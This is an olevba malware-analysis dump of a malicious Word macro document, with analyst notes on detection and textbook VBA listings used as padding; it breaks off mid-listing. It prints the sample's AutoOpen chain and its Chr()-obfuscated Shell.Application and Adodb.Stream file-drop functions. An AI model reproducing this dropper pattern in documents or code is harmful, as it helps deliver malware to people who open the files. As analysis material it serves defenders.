dynamoo

Malicious Word macro

Jun 9th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 1913.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 1913.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 1913.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
' Analyst note: first link of the auto-exec chain (called from autoopen below).
' The Long argument FFFFF is not used in the visible body; the only statement
' calls HOPPOJJ2222, which is not defined in any stream dumped on this page
' (olevba shows ThisDocument, Module1, Module5 and Module3 here) — it presumably
' lives in a module outside this listing and is where the rest of the chain,
' including the value of the Public string HOPPOJJ2211, would be found.
Sub A121212121212(FFFFF As Long)

HOPPOJJ2222

End Sub
  21.  
' Analyst note: Word's AutoOpen entry point (the "AutoExec / AutoOpen" hit in
' the olevba table for this stream) — runs with no user interaction once macros
' are enabled. It only forwards to A121212121212 with the literal 3, which that
' procedure ignores. The auto-exec name plus the Chr()-built CreateObject calls
' in Module5 are the detection-relevant facts; the book listings in between are
' not reached from here.
Sub autoopen()

A121212121212 (3)

End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +------------+-------------+-----------------------------------------+
  32. | Type       | Keyword     | Description                             |
  33. +------------+-------------+-----------------------------------------+
  34. | AutoExec   | AutoOpen    | Runs when the Word document is opened   |
  35. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  36. |            |             | be used to obfuscate strings (option    |
  37. |            |             | --decode to see all)                    |
  38. +------------+-------------+-----------------------------------------+
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Module1.bas
  41. in file: 1913.doc - OLE stream: u'Macros/VBA/Module1'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. Sub AddCustomer()
  44.     '
  45.    ' Set up the form and then Show it
  46.    '
  47.    With frmCustomer
  48.         .Caption = "Add Customer"   ' Set form title
  49.        .Controls("cmdAction").Caption = "Add"      ' Make sure first button is Add
  50.        .Controls("cmdCancel").Caption = "Cancel"   ' Start second button as Cancel
  51.        .Show
  52.     End With
  53.     Set frmCustomer = Nothing
  54. End Sub
  55.  
  56. ' Listing 17.9. The EditCustomer procedure runs when you select
  57. ' the Edit Customer command or click the Edit Customer button.
  58. '
  59. Sub EditCustomer()
  60.     '
  61.    ' Make sure selection is inside database
  62.    '
  63.    If Not InsideDatabase(ActiveCell.Row) Then
  64.         Exit Sub
  65.     End If
  66.     '
  67.    ' Set up the form and then Show it
  68.    '
  69.    With frmCustomer
  70.         .Caption = "Edit Customer"
  71.         .Controls("cmdAction").Caption = "OK"
  72.         .Show
  73.     End With
  74.     Set frmCustomer = Nothing
  75. End Sub
  76.  
' Listing 17.10. This function determines whether
' or not the active cell is inside the Database range.
'
' Analyst note: textbook Excel listing. `d` is never declared in any stream
' dumped on this page, so `d.Range` cannot resolve at run time; the listing as
' pasted is non-functional padding. No explicit return type, so the result is a
' Variant holding True or False.
'   currRow - worksheet row number of the cell being checked
'
Function InsideDatabase(currRow As Integer)

    With d.Range("Database")
        ' A single-row Database range is just the header row: no records
        If .Rows.Count = 1 Then
            MsgBox Prompt:="There are no records in the database.", _
                   Title:="Customer Database", _
                   Buttons:=vbExclamation
            InsideDatabase = False
            Exit Function
        End If
        ' The header row (.Row) and anything at or beyond the last row count as
        ' "outside". VBA's Or is not short-circuiting; both sides are evaluated.
        If currRow <= .Row Or currRow >= (.Row + .Rows.Count) Then
            MsgBox Prompt:="You must select a record inside the database.", _
                   Title:="Customer Database", _
                   Buttons:=vbExclamation
            InsideDatabase = False
        Else
            InsideDatabase = True
        End If
    End With

End Function
  101.  
' Listing 17.11. The FilterCustomers procedure runs when you
' select the Filter Customers command or click the Filter
' Customers button.
'
' Analyst note: textbook Excel listing. `d` is not declared in any dumped
' stream, and `d.c.Value` qualifies the local loop variable `c` with it, which
' is not valid member access — the loop cannot execute as written. Treat this
' module as inert padding; the olevba hits for Module1 come from PhoneCustomer.
'
Sub FilterCustomers()
    Dim criteriaCells As Range
    Dim c As Range
    Dim criteriaEmpty As Boolean
    '
   ' Make sure the Criteria range contains a value
   '
   criteriaEmpty = True
    ' The data row of the Criteria range: one row below its header, one row tall
    Set criteriaCells = d.Range("Criteria").Offset(1).Resize(RowSize:=1)
    For Each c In criteriaCells
        If d.c.Value <> "" Then criteriaEmpty = False
    Next 'c
   If criteriaEmpty Then
        MsgBox "The Criteria range is empty!" & Chr(13) & _
               "Please enter criteria before filtering the database."
        Exit Sub
    End If
    '
   ' Filter the database according to the Criteria range values
   '
   d.Range("Database").AdvancedFilter _
        Action:=xlFilterInPlace, _
        CriteriaRange:=d.Range("Criteria")
End Sub
  130.  
  131. ' Listing 17.12. The ShowAllCustomers procedure runs when you
  132. ' select the Show All Customers command or click the Show All
  133. ' Customers button.
  134. '
  135. Sub ShowAllCustomers()
  136.     With ActiveSheet
  137.         If .FilterMode Then .ShowAllData
  138.     End With
  139. End Sub
  140.  
  141. ' Listing 17.13. The CountCustomers procedure runs when you
  142. ' select the Count Customers command or click the Count
  143. ' Customers button.
  144. '
  145. Sub CountCustomers()
  146.     Dim totalRows As Integer
  147.     Dim alertMsg As String, alertButtons As Integer, alertTitle As String
  148.     '
  149.    ' Customer count is total rows in Database, minus 1
  150.    '
  151.    totalRows = d.Range("Database").Rows.Count - 1
  152.    
  153.     alertMsg = "There are currently " & _
  154.         totalRows & _
  155.         " customers in the database."
  156.     alertButtons = vbInformation
  157.     alertTitle = "Customer Database"
  158.     MsgBox alertMsg, alertButtons, alertTitle
  159.    
  160. End Sub
  161.  
' PhoneCustomer()
' The PhoneCustomer procedure runs when you select the
' Phone Customer command or click the Phone Customer button.
'
' Analyst note: this textbook Excel listing is the origin of olevba's Shell,
' SendKeys, Environ and "dialer.exe" findings for Module1 — it starts the
' Windows Phone Dialer under %WINDIR% and types into it. It is not the sample's
' payload. `d` is never declared in any dumped stream, so `d.currCell.Row`
' fails on the first use, which the On Error trap turns into the "Could not
' start Phone Dialer!" message. Even in an intact copy, every early Exit Sub
' and the BadStart handler leave Application.ScreenUpdating = False.
'
Sub PhoneCustomer()
    ' Any run-time error below jumps to BadStart
    On Error GoTo BadStart
    Dim currCell As Range
    Dim currRow As Integer
    Dim response As Integer
    Dim phoneNumber As String
    Dim firstName As String
    Dim lastName As String
    Dim alertMsg As String
    Dim alertButtons As Integer
    Dim alertTitle As String
    Dim winDrive As String
    Dim winFolder As String
    '
   ' Turn off screen updates and save the active cell
   '
   Application.ScreenUpdating = False
    Set currCell = ActiveCell
    currRow = d.currCell.Row
    '
   ' Make sure selection is inside database
   '
   If Not InsideDatabase(currRow) Then
        Exit Sub
    End If
    '
   ' Get data for MsgBox message
   '
   firstName = d.Cells(currRow, d.Range("FirstNameField").Column)
    ' Last name is assumed to sit in the column right after FirstNameField
    lastName = d.Cells(currRow, d.Range("FirstNameField").Column + 1)
    d.Cells(currRow, d.Range("PhoneNumberField").Column).Select
    '
   ' Check to see if phone number is blank
   '
   phoneNumber = ActiveCell
    If phoneNumber = "" Then
        MsgBox Prompt:="There is no phone number for this customer.", _
               Title:="Customer Database", _
               Buttons:=vbExclamation
        Exit Sub
    End If
    '
   ' Display the message
   '
   alertMsg = "About to dial the following customer:" & _
        Chr(13) & Chr(13) & _
        firstName & " " & lastName & _
        Chr(13) & _
        phoneNumber & _
        Chr(13) & Chr(13) & _
        "Please make sure your modem is turned on."
    alertButtons = vbOKCancel + vbExclamation
    alertTitle = "Phone Customer"
    response = MsgBox(alertMsg, alertButtons, alertTitle)
    '
   ' If user Cancels, return to active cell and bail out
   '
   If response = vbCancel Then
        currCell.Select
        Exit Sub
    End If
    '
   ' Otherwise, copy phone number to Clipboard and phone the customer
   '
   ActiveCell.Copy
    '
   ' Start Phone Dialer with the focus
   '
   ' The executable path is derived from the WINDIR environment variable;
   ' window style 1 = normal window with focus, which SendKeys below relies on
   If InStr(1, d.Application.OperatingSystem, "NT") Then
        '
       ' Use this line with Windows NT:
       '
       winDrive = Left(Environ("WINDIR"), 3)
        Shell winDrive & "Program Files\Windows NT\dialer.exe", 1
    Else
        '
       ' Use this line with Windows 95/98:
       '
       winFolder = Environ("WINDIR")
        Shell winFolder & "\dialer.exe", 1
    End If
    '
   ' Paste the copied phone number with Ctrl+V and
   ' then press Enter to select the Dial button
   '
   SendKeys "^v~", True
    '
   ' Wait eight seconds to give the modem time to dial
   '
   d.Application.Wait Now + TimeValue("00:00:08")
    '
   ' Close the dialog boxes and exit Phone Dialer
   '
   SendKeys "~{ESC}%{F4}"
    '
   ' Get rid of Excel's Copy mode indicators and
   ' select the original cell
   '
   d.Application.CutCopyMode = False
    currCell.Select

    Exit Sub

BadStart:
    ' Reached for any trapped error, not only a failed Shell
    MsgBox "Could not start Phone Dialer!", _
        vbOKOnly + vbExclamation
End Sub
  273.  
  274. ' DeleteCustomer()
  275. ' The DeleteCustomer procedure runs when you select the
  276. ' Delete Customer command or click the Delete Customer button.
  277. '
  278. Sub DeleteCustomer()
  279.     '
  280.    ' Make sure selection is inside database
  281.    '
  282.    If Not InsideDatabase(ActiveCell.Row) Then
  283.         Exit Sub
  284.     End If
  285.     '
  286.    ' Set up the form and then Show it
  287.    '
  288.    With frmCustomer
  289.         .Caption = "Delete Customer"   ' Set form title
  290.        .Controls("cmdAction").Caption = "Delete"   ' Make sure first button is Add
  291.        .Controls("cmdCancel").Caption = "Cancel"   ' Start second button as Cancel
  292.        .Show
  293.     End With
  294.     Set frmCustomer = Nothing
  295. End Sub
  296.  
  297. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  298. ANALYSIS:
  299. +------------+----------------+-----------------------------------------+
  300. | Type       | Keyword        | Description                             |
  301. +------------+----------------+-----------------------------------------+
  302. | Suspicious | Windows        | May enumerate application windows (if   |
  303. |            |                | combined with Shell.Application object) |
  304. | Suspicious | Chr            | May attempt to obfuscate specific       |
  305. |            |                | strings                                 |
  306. | Suspicious | Environ        | May read system environment variables   |
  307. | Suspicious | SendKeys       | May control another application by      |
  308. |            |                | simulating user keystrokes              |
  309. | Suspicious | Shell          | May run an executable file or a system  |
  310. |            |                | command                                 |
  311. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  312. |            |                | may be used to obfuscate strings        |
  313. |            |                | (option --decode to see all)            |
  314. | IOC        | dialer.exe     | Executable file name                    |
  315. +------------+----------------+-----------------------------------------+
  316. -------------------------------------------------------------------------------
  317. VBA MACRO Module5.bas
  318. in file: 1913.doc - OLE stream: u'Macros/VBA/Module5'
  319. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  320. Const DBLOCATION = "C:\Program Files\Microsoft Office\Office\Samples\Northwind.mdb"
' Listing 18.1. A procedure that connects to an Access database.
'
' Analyst note: textbook DAO listing. `db` and `rs` are never declared, and no
' OpenDatabase call exists in any stream dumped on this page, so
' `db.OpenRecordset` fails with an "Object required" error and the procedure
' cannot run past that line. Padding only.
'
Sub DatabaseConnection()

    '
   ' Open the Northwind database (check the path!)
   '
   ' Dir() returns "" when the file does not exist
   If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    '
   ' Open the Customers table (recordset)
   '
   Set rs = db.OpenRecordset("Customers")
    '
   ' Display confirmation message
   '
   MsgBox "Opened " & db.Name & " Successfully!" & _
           Chr(13) & Chr(13) & _
           "The open Recordset is " & rs.Name
    '
   ' Close and release the objects
   '
   rs.Close
    db.Close
    Set rs = Nothing
    Set db = Nothing
End Sub
  353.  
' Listing 18.2. A procedure that connects to a non-Jet database.
'
' Analyst note: textbook DAO listing; links a dBASE IV table into the Jet
' database through a TableDef. `db`, `rs` and `tdDBASE` are never declared and
' `db` is never opened anywhere in the dumped streams, so `db.CreateTableDef`
' fails at run time. Padding only.
'
Sub NonJetConnection()
    '
   ' Open the Jet database (check the path!)
   '
   If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    '
   ' Create TableDef and set the connection information.
   ' This code assumes the CUSTOMER.DBF file (it's on the
   ' CD) is in the same folder as this workbook.
   '
   Set tdDBASE = db.CreateTableDef("Linked dBASE Table")
    ' Connect string: ISAM type plus the folder that holds the .DBF file
    tdDBASE.Connect = "dBASE IV;DATABASE=" & ThisWorkbook.Path
    tdDBASE.SourceTableName = "Customer"
    '
   ' Append the TableDef to create the link
   '
   db.TableDefs.Append tdDBASE
    '
   ' Open the recordset
   '
   Set rs = db.OpenRecordset("Linked dBASE Table", dbOpenSnapshot)
    '
   ' Display confirmation message
   '
   MsgBox "Opened " & db.Name & " Successfully!" & _
            Chr(13) & Chr(13) & _
            "The open Recordset is " & rs.Name & _
            Chr(13) & _
            "The source table is " & tdDBASE.SourceTableName
    '
   ' Close and release the objects
   '
   rs.Close
    db.Close
    Set rs = Nothing
    Set tdDBASE = Nothing
    Set db = Nothing
End Sub
  400.  
' Listing 18.3. A procedure that displays information on
' all the fields in a Recordset.
'
' Analyst note: textbook DAO listing. `db`, `rs` and `fld` are undeclared and
' `db` is never opened in any dumped stream, so the OpenRecordset call fails.
' This is the only caller of TypeOfField on this page. Padding only.
'
Sub DisplayFieldInfo()
    Dim i As Integer
    Dim fieldInfo As String
    '
   ' Open the Northwind database
   '
   If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    '
   ' Open the Categories table
   '
   Set rs = db.OpenRecordset("Categories", dbOpenSnapshot)
    '
   ' Enumerate all fields in the Recordset
   '
   ' Fields is zero-based; the header line shows the 1-based position
   For i = 0 To rs.Fields.Count - 1
        fieldInfo = "Recordset: " & rs.Name & Chr(13) & _
            "Field " & _
            i + 1 & " of " & _
            rs.Fields.Count & Chr(13) & Chr(13)
        '
       ' Set the Field variable and then run through the properties
       '
       Set fld = rs.Fields(i)
        fieldInfo = fieldInfo & _
            "Name: " & fld.Name & Chr(13) & _
            "Allow Zero Length: " & fld.AllowZeroLength & Chr(13) & _
            "Attributes: " & fld.Attributes & Chr(13) & _
            "Collating Order: " & fld.CollatingOrder & Chr(13) & _
            "Default Value: " & fld.DefaultValue & Chr(13) & _
            "Ordinal Position: " & fld.OrdinalPosition & Chr(13) & _
            "Required: " & fld.Required & Chr(13) & _
            "Size: " & fld.Size & Chr(13) & _
            "Source Field: " & fld.SourceField & Chr(13) & _
            "Source Table: " & fld.SourceTable & Chr(13) & _
            "Type of Field: " & TypeOfField(fld.Type) & Chr(13) & _
            "Validation Rule: " & fld.ValidationRule & Chr(13) & _
            "Validation Text: " & fld.ValidationText
        ' One modal dialog per field
        MsgBox Prompt:=fieldInfo, Title:="Field Information"
    Next i
    '
   ' Close and release the objects
   '
   rs.Close
    db.Close
    Set rs = Nothing
    Set fld = Nothing
    Set db = Nothing
End Sub
  458.  
' Analyst note: the Chr()-assembled argument decodes to "Shell.Application".
' HOPPOJJ1155 wraps CreateObject, so HOPPOJJ1144 becomes a Shell.Application
' instance and .Open is invoked on HOPPOJJ2211, the Public String declared in
' Module3. No stream dumped on this page assigns HOPPOJJ2211 — the assignment
' presumably happens in HOPPOJJ2222, which is not shown, so the item that gets
' opened must be recovered from the full sample. The parameter HOPPOJJ1133 is
' unused and no return value is set. For detection, CreateObject of
' Shell.Application reached from an AutoOpen chain is the actionable behaviour;
' the Chr() obfuscation only hides the ProgID from static keyword matching.
Public Function HOPPOJJ1122(HOPPOJJ1133 As String)
    Set HOPPOJJ1144 = HOPPOJJ1155(Chr(83) & Chr(104) & "e" & "l" & Chr(108) & "." & Chr(65) & Chr(112) & Chr(112) & "l" & "i" & "c" & "a" & Chr(116) & "i" & Chr(111) & Chr(110))
HOPPOJJ1144.Open (HOPPOJJ2211)
End Function
' Analyst note: thin wrapper around CreateObject so that the ProgID can be
' assembled at run time by the callers (olevba's "CreateObject" hit for this
' module). Returns the created object; HOPPOJJ1166 is the ProgID string. When
' triaging, decode the Chr() expression at each call site of this function.
Public Function HOPPOJJ1155(HOPPOJJ1166 As String)
    Set HOPPOJJ1155 = CreateObject(HOPPOJJ1166)
End Function
' Analyst note: the Chr()-assembled ProgID decodes to "Adodb.Stream". The
' stream is set to binary mode (.Type = 1, adTypeBinary), HOPPOJJ2200 is
' written into it and it is saved to the path HOPPOJJ1199 with option 2
' (adSaveCreateOverWrite), i.e. an existing file at that path is replaced.
' This is the file-drop primitive behind olevba's Open / Write / SaveToFile
' hits. Neither the caller nor the origin of the bytes in HOPPOJJ2200 appears
' in the streams dumped on this page. The stream is never closed and the
' function sets no return value.
Public Function HOPPOJJ1177(HOPPOJJ2200 As Variant, HOPPOJJ1199 As String)
Dim HOPPOJJ1188: Set HOPPOJJ1188 = HOPPOJJ1155("A" & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "m")

With HOPPOJJ1188
   .Type = 1
    .Open
    .write HOPPOJJ2200
    .savetofile HOPPOJJ1199, 2
End With
End Function
  476.  
  477.  
  478.  
  479. ' TypeOfField()
  480. ' Function to translate the constant returned by a Field object's
  481. ' Type property into a descriptive string.
  482. '
  483. Function TypeOfField(fldConstant As Integer) As String
  484.  
  485.     Select Case fldConstant
  486.         Case 1   ' dbBoolean
  487.            TypeOfField = "Boolean"
  488.         Case 2   ' dbByte
  489.            TypeOfField = "Byte"
  490.         Case 3   ' dbInteger
  491.            TypeOfField = "Integer"
  492.         Case 4   ' dbLong
  493.            TypeOfField = "Long Integer"
  494.         Case 5   ' dbCurrency
  495.            TypeOfField = "Currency"
  496.         Case 6   ' dbSingle
  497.            TypeOfField = "Single"
  498.         Case 7   ' dbDouble
  499.            TypeOfField = "Double"
  500.         Case 8   ' dbDate
  501.            TypeOfField = "Date"
  502.         Case 10  ' dbText
  503.            TypeOfField = "Text"
  504.         Case 11  'dbLongBinary
  505.            TypeOfField = "OLE Object"
  506.         Case 12  ' dbMemo
  507.            TypeOfField = "Memo"
  508.         Case 15  ' dbGUID
  509.            TypeOfField = "GUID"
  510.     End Select
  511. End Function
  512.  
' Listing 18.4. A procedure that opens a recordset using
' a SQL SELECT expression.
'
' Analyst note: textbook DAO listing with a fixed SELECT (no user input is
' concatenated into the SQL). `db` and `rs` are undeclared and `db` is never
' opened in any dumped stream, so the OpenRecordset call fails. Padding only.
'
Sub QueryCustomers()
    Dim strSELECT As String
    '
   ' Open the Northwind database (check the path!)
   '
   If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    '
   ' Store the SELECT statement in a string variable
   '
   strSELECT = "SELECT CompanyName,Region,Country " & _
                "FROM Customers " & _
                "WHERE Country = 'Canada' " & _
                "ORDER BY CompanyName"
    '
   ' Open the recordset
   '
   Set rs = db.OpenRecordset(strSELECT)
    '
   ' Display confirmation message
   '
   MsgBox "The filtered Recordset contains " & _
    rs.RecordCount & " records."
    '
   ' Close and release the objects
   '
   rs.Close
    db.Close
    Set rs = Nothing
    Set db = Nothing
End Sub
  552.  
' Listing 18.5. A procedure that creates a recordset from
' a QueryDef object.
'
' Analyst note: textbook DAO listing. `db`, `qd` and `rs` are undeclared and
' `db` is never opened in any dumped stream, so `db.QueryDefs` fails at run
' time. Padding only.
'
Sub QueryDefExample()
    '
   ' Open the Northwind database (check the path!)
   '
   If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    '
   ' Assign the QueryDef object
   '
   ' A saved query that ships with the Northwind sample
   Set qd = db.QueryDefs("Products Above Average Price")
    '
   ' Open the recordset
   '
   Set rs = qd.OpenRecordset()
    '
   ' Display confirmation message
   '
   MsgBox "The filtered Recordset contains " & _
        rs.RecordCount & " records."
    '
   ' Close and release the objects
   '
   rs.Close
    db.Close
    Set rs = Nothing
    Set qd = Nothing
    Set db = Nothing
End Sub
  589.  
' Listing 18.6. A procedure that reads 100 rows from a
' recordset into a worksheet.
'
' Analyst note: textbook DAO/Excel listing. `db`, `qd` and `rs` are undeclared
' and `db` is never opened in any dumped stream; `db.Worksheets(...)` also
' addresses a worksheet through what the rest of the module treats as a DAO
' database, which a DAO Database object does not expose — presumably
' ThisWorkbook in the original. Either way the procedure fails before writing
' anything. Padding only.
'
Sub ReadDataIntoExcel()
    Dim recArray As Variant
    Dim i As Integer, j As Integer
    '
   ' Open the Jet database, QueryDef, and Recordset
   '
   If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set qd = db.QueryDefs("Invoices")
    Set rs = qd.OpenRecordset()
    '
   ' Head for Database Records and clear the sheet
   '
   With db.Worksheets("Database Records").[a1]
        .CurrentRegion.Clear
        '
       ' Read the data using GetRows
       '
       ' GetRows returns a 2-D array indexed (field, row), hence the
       ' transposed loop bounds below; at most 100 rows are fetched
       recArray = rs.GetRows(100)
        For i = 0 To UBound(recArray, 2)
            For j = 0 To UBound(recArray, 1)
                ' Row 0 is reserved for the field names written next
                .Offset(i + 1, j) = recArray(j, i)
            Next j
        Next i
        '
       ' Enter the field names and format the cells
       '
       For j = 0 To rs.Fields.Count - 1
            .Offset(0, j) = rs.Fields(j).Name
            .Offset(0, j).Font.Bold = True
            .Offset(0, j).EntireColumn.AutoFit
        Next j

    End With
    '
   ' Close and release the objects
   '
   rs.Close
    db.Close
    Set rs = Nothing
    Set qd = Nothing
    Set db = Nothing
End Sub
  641.  
' Listing 18.7. A procedure that filters out OLE Object
' fields before retrieving a recordset.
'
' Analyst note: textbook DAO/Excel listing. `db`, `rs` and `fld` are
' undeclared and `db` is never opened in any dumped stream, so the first
' OpenRecordset fails; `db.Worksheets` has the same problem as in
' ReadDataIntoExcel. The SELECT is built from field names read back from the
' database itself, not from user input. Two latent issues in the intact
' listing: the first recordset is overwritten without being closed, and if no
' field survives the filter the Left() trim removes the "T" of "SELECT".
' Padding only.
'
Sub RetrieveCategories()
    Dim strSELECT As String, i As Integer
    '
   ' Open the Jet database
   '
   If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    '
   ' Open the full Categories table
   '
   Set rs = db.OpenRecordset("Categories")
    '
   ' The strSELECT variable will hold the SQL SELECT statement
   ' that filters the Recordset to remove OLE Object fields
   '
   strSELECT = "SELECT "
    '
   ' Run through the recordset fields
   '
   For Each fld In rs.Fields
        '
       ' Check for OLE Object fields
       '
       ' dbLongBinary is the DAO constant TypeOfField labels "OLE Object"
       If fld.Type <> dbLongBinary Then
            '
           ' If it's not an OLE Object field, add it to the SELECT statement
           '
           strSELECT = strSELECT & fld.Name & ","
        End If
    Next fld
    '
   ' Remove the trailing comma
   '
   strSELECT = Left(strSELECT, Len(strSELECT) - 1)
    '
   ' Add the FROM clause
   '
   strSELECT = strSELECT & " FROM Categories"
    '
   ' Open the filtered recordset
   '
   ' Replaces the first recordset; that one is never closed
   Set rs = db.OpenRecordset(strSELECT)
    '
   ' Retrieve the records
   '
   db.Worksheets("Database Records").Activate
    With db.Worksheets("Database Records").[a1]
        .CurrentRegion.Clear
        ' Data goes one row below the header row written next
        .Offset(1).CopyFromRecordset rs
        '
       ' Enter the field names and format the cells
       '
       For i = 0 To rs.Fields.Count - 1
            .Offset(0, i) = rs.Fields(i).Name
            .Offset(0, i).Font.Bold = True
            .Offset(0, i).EntireColumn.AutoFit
        Next i
    End With
    '
   ' Close and release the objects
   '
   rs.Close
    db.Close
    Set rs = Nothing
    Set fld = Nothing
    Set db = Nothing
End Sub
  717.  
  718. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  719. ANALYSIS:
  720. +------------+----------------+-----------------------------------------+
  721. | Type       | Keyword        | Description                             |
  722. +------------+----------------+-----------------------------------------+
  723. | Suspicious | Open           | May open a file                         |
  724. | Suspicious | Chr            | May attempt to obfuscate specific       |
  725. |            |                | strings                                 |
  726. | Suspicious | CreateObject   | May create an OLE object                |
  727. | Suspicious | SaveToFile     | May create a text file                  |
  728. | Suspicious | Run            | May run an executable file or a system  |
  729. |            |                | command                                 |
  730. | Suspicious | sample         | May detect Anubis Sandbox               |
  731. | Suspicious | Write          | May write to a file (if combined with   |
  732. |            |                | Open)                                   |
  733. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  734. |            |                | may be used to obfuscate strings        |
  735. |            |                | (option --decode to see all)            |
  736. +------------+----------------+-----------------------------------------+
  737. -------------------------------------------------------------------------------
  738. VBA MACRO Module3.bas
  739. in file: 1913.doc - OLE stream: u'Macros/VBA/Module3'
  740. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  741. Public HOPPOJJ2211 As String
  742.  
  743. '
  744. ' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
  745. '
  746. Sub GetNumbers()
  747.     Dim done As Boolean
  748.     Dim divisor As Variant
  749.     Dim dividend As Variant
  750.     '
  751.    ' Prompt user for dividend and divisor.
  752.    '
  753.    done = False
  754.     Do While Not done
  755.         dividend = InputBox("Enter the dividend:", "Divider")
  756.         divisor = InputBox("Enter the divisor:", "Divider")
  757.         done = Divide(dividend, divisor)
  758.     Loop
  759. End Sub
'
' Listing 23.2. The Divide function divides the dividend by the divisor.
' The function traps "division by zero" errors.
'
' Returns True when GetNumbers should stop prompting, False when the user
' asked to try again. Note the trap catches every run-time error in the
' body (a non-numeric dividend raises a type mismatch here too), yet the
' handler's message always blames a zero divisor.
'
Function Divide(dividend, divisor) As Boolean
    Dim msg As String
    Dim result As Single
    '
   ' Set the trap
   '
   On Error GoTo DivByZeroHandler
    '
   ' Perform the division
   '
   result = dividend / divisor
    '
   ' If it went okay, display the result
   '
   msg = dividend & _
          " divided by " & _
          divisor & _
          " equals " & _
          result
    MsgBox msg
    '
   ' Set the return value and bypass the error handler
   '
   Divide = True
    Exit Function
    '
   ' Code branches here if an error occurs
   '
DivByZeroHandler:
    '
   ' Display the error message
   '
   ' The Single `result` is reused to hold the MsgBox button code
   result = MsgBox("You entered 0 as the divisor! Try again?", _
                    vbYesNo + vbQuestion, _
                    "Divider")
    '
   ' Return the user's choice
   '
   ' Yes = keep looping in GetNumbers (not done); No = stop (done)
   If result = vbYes Then
        Divide = False
    Else
        Divide = True
    End If
End Function
'
' Listing 23.3 Backs up the active workbook to a drive specified by
' the user. Traps any errors (such as having no disk in the drive).
'
' Analyst note: textbook Excel listing; it saves the active workbook and
' writes a copy to a user-chosen drive — no network or shell activity.
' Application.DisplayAlerts is switched off and never restored on any exit
' path. In the handler, vbRetry resumes at the statement after the one that
' failed (Resume Next) and clears `done`, vbIgnore re-runs the failing
' statement (Resume), and vbAbort falls out of the handler, ending the Sub.
'

Sub BackUpToFloppy()
    Dim backupDrive As String
    Dim backupName As String
    Dim msg As String
    Dim done As Boolean
    Dim result As Integer
    '
   ' Define the location of the error handler
   '
   On Error GoTo ErrorHandler
    '
   ' Initialize some variables and then loop
   '
   Application.DisplayAlerts = False
    done = False
    backupDrive = "A:"
    While Not done
        '
       ' Get the drive to use for the backup
       '
       backupDrive = InputBox( _
            Prompt:="Enter the drive letter for the backup:", _
            Title:="Backup", _
            Default:=backupDrive)
        '
       ' Check to see if OK was selected
       '
       ' InputBox returns "" on Cancel as well as on an empty entry
       If backupDrive <> "" Then
            '
           ' Make sure the backup drive contains a colon (:)
           '
           ' Keeps only the first character of whatever was typed
           If InStr(backupDrive, ":") = 0 Then
                backupDrive = Left(backupDrive, 1) & ":"
            End If
            '
           ' First, save the file
           '
           ActiveWorkbook.Save
            '
           ' Assume the backup will be successful,
           ' so set done to True to exit the loop
           '
           done = True
            '
           ' Concatenate drive letter and workbook name
           '
           ' No path separator is inserted; "A:" & name is the root of that drive
           backupName = backupDrive & ActiveWorkbook.Name
            '
           ' Make a copy on the specified drive
           '
           ActiveWorkbook.SaveCopyAs FileName:=backupName
        Else
            Exit Sub
        End If
    Wend
    '
   ' Bypass the error handler
   '
   Exit Sub
    '
   ' Code branches here if an error occurs
   '
ErrorHandler:
    msg = "An error has occurred!" & Chr(13) & Chr(13) & _
          "Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
          "letter, or Ignore to attempt the backup again."
    result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
    Select Case result
        Case vbAbort
            done = True
        Case vbRetry
            done = False
            Resume Next
        Case vbIgnore
            Resume
    End Select
End Sub
  890. '
  891. ' Listing 23.4. This procedure divides two numbers. It traps three specific
  892. ' errors: division by zero, overflow, and type mismatch.
  893. '
  Sub DivideNumbers()
      '
      ' Listing 23.4: prompts for a dividend and a divisor, shows the quotient,
